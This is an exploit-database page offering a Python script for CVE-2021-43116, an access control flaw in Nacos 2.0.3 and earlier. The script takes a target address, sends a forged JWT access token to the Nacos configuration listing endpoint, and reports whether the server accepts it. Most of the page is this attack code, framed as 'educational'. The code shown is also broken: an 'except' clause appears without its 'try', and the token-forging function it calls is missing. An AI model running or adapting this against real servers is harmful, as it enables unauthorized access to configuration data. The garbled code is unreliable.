Nacos 2.0.3 access control vulnerability Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-04-03 |
Type : webapps |
Platform : java
This exploit / vulnerability Nacos 2.0.3 access control vulnerability is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Nacos 2.0.3 - Access Control vulnerability
# Date: 2023-01-17
# Exploit Author: Jenson Zhao
# Vendor Homepage: https://nacos.io/
# Software Link: https://github.com/alibaba/nacos/releases/
# Version: Up to (including)2.0.3
# Tested on: Windows 10
# CVE : CVE-2021-43116
# Required before execution: pip install PyJWT,requests
import argparse
import base64
import requests
import time
import json
from jwt.algorithms import has_crypto, requires_cryptography
from jwt.utils import base64url_encode, force_bytes
from jwt import PyJWS
except KeyError:
if not has_crypto and algorithm in requires_cryptography:
raise NotImplementedError(
"Algorithm '%s' could not be found. Do you have cryptography "
"installed?" % algorithm
)
else:
raise NotImplementedError('Algorithm not supported')
def check(url, https, token):
if https:
r = requests.get(
url='https://' + url + '/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=' + token + '&username=',
verify=False)
else:
r = requests.get(
url='http://' + url + '/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=' + token + '&username=')
if r.status_code == 403:
print("There is no CVE-2021-43116 problem with the url!")
else:
print("There is CVE-2021-43116 problem with the url!")
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help="URL of the target. example: 192.168.1.1:8848")
parser.add_argument("-s", "--https", help="Whether https is used. Default is false")
args = parser.parse_args()
url = args.target
https = False
if (args.https):
https = args.https
if url:
check(url, https, JwtGenerate())
else:
print('Please enter URL!')